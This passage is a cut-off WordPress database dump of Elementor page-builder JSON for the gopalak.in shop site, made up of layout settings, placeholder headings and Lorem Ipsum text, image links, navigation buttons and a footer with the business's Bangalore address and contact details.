0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\",\"margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"0\",\"bottom\":\"-25\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"27\",\"right\":\"1\",\"bottom\":\"42\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"2a854a8\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#134019\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"407c3fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1473cd0\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"5c71249\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#1B4121\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"caccabd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"7382c00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"7ce177e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#203E24\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8144,1439,'_elementor_page_assets','a:0:{}'),(8147,1440,'_elementor_edit_mode','builder'),(8148,1440,'_elementor_template_type','wp-page'),(8149,1440,'_elementor_version','3.7.7'),(8150,1440,'_wp_page_template','elementor_canvas'),(8151,1440,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"235\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\",\"margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"0\",\"bottom\":\"-25\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"27\",\"right\":\"1\",\"bottom\":\"42\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"2a854a8\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#134019\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"407c3fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1473cd0\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"5c71249\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#1B4121\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"caccabd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"7382c00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"7ce177e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#203E24\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 